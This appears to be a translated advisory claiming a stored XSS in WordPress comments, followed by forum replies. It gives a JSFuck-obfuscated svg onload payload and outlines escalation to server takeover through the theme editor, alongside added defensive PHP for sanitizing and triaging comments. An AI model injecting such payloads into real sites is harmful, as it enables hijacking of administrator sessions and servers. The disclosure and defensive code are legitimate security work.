Stored XSS vulnerability affecting all WordPress versions
Discovered by:
SecJack
安全周@上海匡创 (Security Week @ Shanghai Kuangchuang)
Vulnerability overview and impact
Platform: PHP + MySQL
Vulnerability type: stored XSS
Affected file: formatting.php
Payload: <svg onload=alert('1')> (obfuscated)
The code is as follows:
<svg onload=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()>
Affected versions: all versions
Severity: high
Vendor: WordPress
Vendor site: https://www.wordpress.org/
Install base: very large
Source code analysed: yes
Affects the default configuration: yes
This vulnerability affects every version of WordPress, up to and including the latest release (4.8): the comment area is subject to stored XSS. An attacker can inject JavaScript through a WordPress comment without any authentication.
The JavaScript runs when the comment is viewed. If an administrator logs in and views the comment, the attacker may get into the admin backend and, through the theme or plugin editor, execute commands and take control of the entire server.
The attacker can of course also create new administrators, change the administrator password, and so on: anything an administrator can do on the target system.
0x0 Code filtering layer
The relevant code in formatting.php:
function make_clickable( $text ) {
    $r = '';
    $textarr = preg_split( '/(<[^<>]+>)/', $text, -1, PREG_SPLIT_DELIM_CAPTURE ); // split out HTML tags
    $nested_code_pre = 0; // Keep track of how many levels link is nested inside <pre> or <code>
    foreach ( $textarr as $piece ) {

        if ( preg_match( '|^<code[\s>]|i', $piece ) || preg_match( '|^<pre[\s>]|i', $piece ) || preg_match( '|^<script[\s>]|i', $piece ) || preg_match( '|^<style[\s>]|i', $piece ) )
            $nested_code_pre++;
        elseif ( $nested_code_pre && ( '</code>' === strtolower( $piece ) || '</pre>' === strtolower( $piece ) || '</script>' === strtolower( $piece ) || '</style>' === strtolower( $piece ) ) )
            $nested_code_pre--;

        if ( $nested_code_pre || empty( $piece ) || ( $piece[0] === '<' && ! preg_match( '|^<\s*[\w]{1,20}+://|', $piece ) ) ) {
            $r .= $piece;
            continue;
        }

        // Long strings might contain expensive edge cases ...
        if ( 10000 < strlen( $piece ) ) {
            // ... break it up
            foreach ( _split_str_by_whitespace( $piece, 2100 ) as $chunk ) { // 2100: Extra room for scheme and leading and trailing parentheses
                if ( 2101 < strlen( $chunk ) ) {
                    $r .= $chunk; // Too big, no whitespace: bail.
                } else {
                    $r .= make_clickable( $chunk );
                }
            }
        } else {
            $ret = " $piece "; // Pad with whitespace to simplify the regexes

            $url_clickable = '~
                ([\s(<.,;:!?])                                  # 1: Leading whitespace, or punctuation
                (                                               # 2: URL
                    [\w]{1,20}+://                              # Scheme and hier-part prefix
                    (?=\S{1,2000}\s)                            # Limit to URLs less than about 2000 characters long
                    [\w\x80-\xff#%\~/@\[\]*(+=&$-]*+            # Non-punctuation URL character
                    (?:                                         # Unroll the Loop: Only allow punctuation URL character if followed by a non-punctuation URL character
                        [\'.,;:!?)]                             # Punctuation URL character
                        [\w\x80-\xff#%\~/@\[\]*(+=&$-]++        # Non-punctuation URL character
                    )*
                )
                (\)?)                                           # 3: Trailing closing parenthesis (for parenthesis balancing post processing)
            ~xS'; // The regex is a non-anchored pattern and does not have a single fixed starting character.
                  // Tell PCRE to spend more time optimizing since, when used on a page load, it will probably be used several times.

            $ret = preg_replace_callback( $url_clickable, '_make_url_clickable_cb', $ret );

            $ret = preg_replace_callback( '#([\s>])((www|ftp)\.[\w\x80-\xff\#$%&~/.\-;:=,?@\[\]+]+)#is', '_make_web_ftp_clickable_cb', $ret );
            $ret = preg_replace_callback( '#([\s>])([.0-9a-z_+-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,})#i', '_make_email_clickable_cb', $ret );

            $ret = substr( $ret, 1, -1 ); // Remove our whitespace padding.
            $r .= $ret;
        }
    }

    // Cleanup of accidental links within links
    return preg_replace( '#(<a([ \r\n\t]+[^>]+?>|>))<a [^>]+?>([^>]+?)</a></a>#i', "$1$3</a>", $r );
}
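The function above only rewrites bare URLs into anchors; it makes no decision about which tags or attributes may appear in a comment, so the JSFuck obfuscation of the onload value neither helps nor hinders it. The control that decides whether a stored `<svg onload=...>` reaches an administrator's browser is a structural allowlist on element and attribute names, the role played in WordPress by the KSES filters. What follows is an added, self-contained PHP illustration of such an allowlist sanitizer, written for this edit; it is not wp_kses and not the report author's code. It assumes PHP 7.4 or later with the DOM extension, and the allowlist and sample comment bodies are constructed for the demonstration (the JSFuck value is shortened from the one in the report).

```php
<?php
// Added example (not WordPress code, not wp_kses): a minimal allowlist
// sanitizer for comment HTML. It decides on element and attribute NAMES,
// so an on* handler is removed no matter how its value is obfuscated.
// Assumes PHP 7.4+ with the DOM extension.

// Constructed allowlist for the demo: element => permitted attributes.
const ALLOWED_HTML = [
    'a'          => ['href', 'title'],
    'b'          => [],
    'strong'     => [],
    'em'         => [],
    'i'          => [],
    'code'       => [],
    'pre'        => [],
    'blockquote' => ['cite'],
    'p'          => [],
    'br'         => [],
];

// Only these URL schemes may appear in href/cite; scheme-less (relative) URLs pass.
const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];

function is_safe_url(string $url): bool {
    $url = trim($url);
    if (!preg_match('/^([a-z][a-z0-9+.\-]*):/i', $url, $m)) {
        return true; // relative URL, no scheme at all
    }
    return in_array(strtolower($m[1]), ALLOWED_SCHEMES, true);
}

function clean_node(DOMNode $node): void {
    // Iterate over a snapshot because the child list is mutated as we go.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if ($child instanceof DOMText) {
            continue; // plain text is re-escaped by DOMDocument on output
        }
        if (!$child instanceof DOMElement) {
            $node->removeChild($child); // comments, processing instructions
            continue;
        }
        $tag = strtolower($child->tagName);
        if (!isset(ALLOWED_HTML[$tag])) {
            // Disallowed element (<svg>, <script>, ...): keep only its text.
            $text = $node->ownerDocument->createTextNode($child->textContent);
            $node->replaceChild($text, $child);
            continue;
        }
        foreach (iterator_to_array($child->attributes) as $attr) {
            $name = strtolower($attr->name);
            $keep = in_array($name, ALLOWED_HTML[$tag], true)
                && (!in_array($name, ['href', 'cite'], true) || is_safe_url($attr->value));
            if (!$keep) {
                $child->removeAttribute($attr->name); // drops every on* handler
            }
        }
        clean_node($child);
    }
}

function sanitize_comment_html(string $html): string {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // silence warnings about unknown tags such as <svg>
    // Wrap the fragment so there is one known container to serialise from.
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>');
    libxml_clear_errors();
    $root = $doc->getElementsByTagName('div')->item(0);
    clean_node($root);
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed sample comment bodies; the JSFuck value is shortened from the report's.
$samples = [
    '<svg onload=[][(![]+[])[+[]]]()>hello',
    'See <a href="https://example.com/" onclick="alert(1)">this page</a>',
    '<a href="javascript:alert(1)">click</a> and <script>alert(1)</script>',
];
foreach ($samples as $s) {
    printf("in:  %s\nout: %s\n\n", $s, sanitize_comment_html($s));
}
```

Because the decision is taken on the attribute and element name, the length or encoding of the onload value never enters into it: the `<svg>` element is dropped and only its text survives, the `onclick` on the anchor is removed while `href` is kept, and an `href` with a `javascript:` scheme is removed while the link text remains. For the post-exploitation chain the report describes (theme or plugin editor leading to command execution), WordPress also provides the `DISALLOW_FILE_EDIT` constant: `define( 'DISALLOW_FILE_EDIT', true );` in wp-config.php removes the built-in theme and plugin file editors from the admin UI, so a hijacked admin session cannot use them to write PHP to disk.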
0x01 Testing process
In earlier cases the injected JavaScript clearly could not be triggered from the admin panel, so the XSS payload has to be written into a comment in the comment area.
On reviewing the code again, we found that it does not filter the metacharacters of an obfuscated svg tag, so we first obfuscated our usual malicious code and then tested with that.
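For the moderation side, an added triage helper written for this edit (not part of the report or of WordPress; the sample comment bodies are constructed): JSFuck output is built from only the six characters `[]()!+`, so a comment of any length drawn almost entirely from that alphabet, or any tag carrying an `on*` attribute, is worth holding for review before it is rendered on an administrator's screen. The threshold values are assumptions chosen for the demo, not measured figures.

```php
<?php
// Added example, not from the original report: score comment bodies for
// JSFuck-style obfuscation and inline event-handler attributes so they can be
// held for moderation. Thresholds are assumptions chosen for the demo.

const JSFUCK_ALPHABET = '[]()!+';

/** Fraction of non-whitespace characters that belong to the JSFuck alphabet. */
function jsfuck_density(string $body): float {
    $stripped = preg_replace('/\s+/', '', $body);
    if ($stripped === '') {
        return 0.0;
    }
    $hits = 0;
    $len = strlen($stripped);
    for ($i = 0; $i < $len; $i++) {
        if (strpos(JSFUCK_ALPHABET, $stripped[$i]) !== false) {
            $hits++;
        }
    }
    return $hits / $len;
}

/** True when any tag carries an inline event-handler attribute (on*=). */
function has_event_handler_attr(string $body): bool {
    return (bool) preg_match('/<\w+[^>]*\son[a-z]+\s*=/i', $body);
}

/** Returns the reasons a comment should be held for moderation, or [] if none. */
function triage_comment(string $body, float $density_threshold = 0.8, int $min_len = 32): array {
    $reasons = [];
    $density = jsfuck_density($body);
    // Density alone is noisy on short bodies, so require a minimum length too.
    if (strlen($body) >= $min_len && $density >= $density_threshold) {
        $reasons[] = sprintf('jsfuck-like character density %.2f', $density);
    }
    if (has_event_handler_attr($body)) {
        $reasons[] = 'inline event handler attribute';
    }
    return $reasons;
}

// Constructed sample comment bodies (not real submissions). The second is a
// shortened form of the vector in the report; the third is benign text that
// happens to use brackets and plus signs, to show the density check alone
// does not trip on ordinary punctuation.
$samples = [
    'Great post, thanks! See also https://example.com/page (more info here).',
    '<svg onload=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]]()>',
    'Math question: is (a+b)+(c+d) == a+(b+(c+d))? [yes] [no]',
];
foreach ($samples as $body) {
    $reasons = triage_comment($body);
    printf("%-5s %s\n", $reasons ? 'HOLD' : 'ok', substr($body, 0, 60));
    foreach ($reasons as $reason) {
        echo "      - $reason\n";
    }
}
```

The first and third samples pass (the third has plenty of brackets and plus signs but they make up only about a third of its characters), while the second is held for both reasons: roughly 85% of its characters come from the JSFuck alphabet and the `<svg` tag carries an `onload` attribute. Either signal on its own is enough to hold a comment; the point of keeping both is that the attribute check catches a short, unobfuscated `onload=alert(1)` and the density check catches an obfuscated body even if the tag is spelled in a way the regex misses.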
JSFuck: if you really want to write a script that does something meaningful and then encode it with JSFuck, the length explodes. Have you tested stealing cookies, combining it with CSRF and other tricks?
Yes, a genuinely offensive payload really is very, very long, sigh...
That scared me into rushing off to add a function, only to find we're already on version 4.9, haha. Come take a look, master.